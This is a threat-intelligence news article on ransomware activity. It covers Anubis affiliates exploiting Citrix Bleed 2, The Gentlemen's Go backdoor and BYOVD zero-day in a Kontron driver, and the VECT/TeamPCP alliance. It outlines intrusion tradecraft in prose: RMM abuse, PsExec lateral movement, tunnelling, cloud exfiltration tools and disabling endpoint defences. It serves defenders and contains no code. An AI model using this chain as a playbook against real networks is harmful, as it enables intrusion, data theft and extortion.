Ransomware Resurgence: Anubis Exploits Citrix Bleed 2, The Gentlemen Uses 0-Day, and VECT Forms New Alliances
Recent reports highlight a significant uptick in ransomware activity, with the **Anubis** operation leveraging the critical **Citrix Bleed 2** vulnerability for initial access. Concurrently, **The Gentlemen** RaaS group is exploiting a zero-day in a third-party driver, while new partnerships, such as between **VECT** and **TeamPCP**, signal an evolving threat landscape.

Threat actors associated with the **Anubis** ransomware operation have been observed exploiting the **Citrix Bleed 2** (**CVE-2025-5777**) vulnerability to gain initial access to target networks.
According to a report from **Arctic Wolf**, **Anubis** affiliates employ varied tactics but consistently utilize legitimate Remote Management and Monitoring (RMM) tools, credential access, and hands-on-keyboard procedures for lateral movement.
"**Anubis** affiliates repeatedly abused legitimate remote access and administration tools, including **ScreenConnect**, **Zoho Assist**, **MeshAgent**, **Remotely**, **UltraVNC**, and **Total Software Deployment**, to blend in with normal IT activity while maintaining control of victim systems," **Arctic Wolf** stated.
### Anubis: A Rebranded Threat with Aggressive Tactics
**Anubis** is a ransomware-as-a-service (RaaS) group that emerged in late 2024, rebranding from **Sphinx** ransomware. The group formally announced its operation on the **Ransomware and Advanced Malware Protection (RAMP)** underground forum in February 2025.
Data from **Ransomware.Live** indicates that the group has claimed 91 victims on its data leak site, with 11 reported in June 2026 alone. Targeted sectors include healthcare, business services, manufacturing, technology, and financial services, with over 50% of victims located in the U.S.
A July 2025 report by **Rubrik Zero Labs** highlighted **Anubis**'s attractive profit splits for affiliates (80% of ransom) and an irreversible data-wiping feature. This feature, activated via the `/WIPEMODE` module, reduces files to 0 KB, significantly increasing pressure on victims to pay.
### Initial Access and Lateral Movement
The ransomware intrusions, observed this year, involve both valid VPN credential use and the exploitation of **CVE-2025-5777** (CVSS score: 9.3). This critical flaw in **Citrix NetScaler ADC** and **Gateway** allows attackers to bypass authentication when the appliance is configured as a Gateway or AAA virtual server.
The source of the VPN credentials remains unconfirmed but could stem from prior compromises, initial access brokers (IABs), credential stuffing, or information stealer activity.
"In addition to **CitrixBleed 2** exploitation, valid **Cisco AnyConnect** VPN logins were observed from several hosting ASNs," **Arctic Wolf** explained. "Malicious VPN authentication was then followed by login activity involving **RDP** and **SMB**, leading to credential access, **PsExec** service creation, RMM deployment, and ultimately invoking cloud-transfer tooling for exfiltration."
Lateral movement is often facilitated by **RDP** and **PsExec**, followed by the deployment of legitimate RMM tools for persistent access and stealthy operations. Some intrusions also configure a **Cloudflare Tunnel** (**cloudflared**) to establish covert tunnels to victim environments.
### Data Exfiltration and Defense Evasion
The subsequent phase involves credential gathering for deeper access, followed by the installation of tools like **S3 Browser**, **rclone**, **s5cmd**, **WinSCP**, and **PuTTY** for data exfiltration. Concurrently, attackers disable system defenses and attempt to complicate forensic analysis.
"These techniques included **Windows Defender** real-time protection disablement, **SophosUninstall** activity, **PCHunter**-related artifacts, and log clearing or manipulation across multiple systems," the cybersecurity company detailed. "In at least one intrusion, an **Anubis** encryptor was deleted after execution, reducing the availability of on-disk payload artifacts for later analysis."
### The Gentlemen's Go Backdoor and BYOVD 0-Day Exploit
**Kaspersky** recently detailed **The Gentlemen** RaaS group's methods, which include exploiting known vulnerabilities, using stolen/weak credentials, and deploying a **Go**-based backdoor for remote command execution. The group employs Group Policy or **PsExec** for lateral movement and utilizes the bring your own vulnerable driver (**BYOVD**) technique for defense evasion.
The backdoor collects system information, exfiltrates it to an external server, and awaits operator commands. This functionality allows **The Gentlemen**'s red team to pivot within target networks and expand their scan coverage.
**Expel** further revealed that **The Gentlemen** has weaponized a zero-day vulnerability in the little-known third-party driver **ktapi.sys**, part of an API developed by **Kontron**. This **BYOVD** exploit grants kernel-level access, bypasses **Windows** security, and kills protected security processes from vendors like **Microsoft**, **ESET**, **Palo Alto Networks**, and **SentinelOne**.
Marcus Hutchins, principal threat researcher at **Expel**, emphasized the severity: "**BYOVD** continues to be a huge threat to enterprises, enabling attackers to disable state-of-the-art endpoint security systems in seconds. Even using the latest **Windows** version, with all exploit mitigations enabled, does not provide complete protection."
### VECT and TeamPCP's Ransomware Partnership

**Sophos Counter Threat Unit** investigated a new partnership between **VECT** and **TeamPCP**, announced in March 2026. This alliance aims to combine supply chain attack-driven credential theft with ransomware deployment.
"The formal partnership between **TeamPCP** and **VECT** allows **VECT** to deploy ransomware across all organizations compromised in the **Trivy** and **LiteLLM** supply chain attacks," **Sophos** reported. Prior to this, **TeamPCP** operated under the **CipherForce** brand, which listed six victims in February 2026 before rebranding.
Recent analyses by **Check Point** and **JUMPSEC** have identified implementation flaws in **VECT**'s encryptor, causing files larger than 128 KB to be permanently destroyed rather than encrypted. **TeamPCP** responded by claiming they never used **VECT**'s encryptor, asserting ownership of their "own private locker," **CipherForce**.
Despite the technical shortcomings, **Sophos** notes that "The **VECT**/**TeamPCP** alliance represents a meaningful shift in the ransomware threat landscape, even accounting for the technical shortcomings that undermine its operational effectiveness."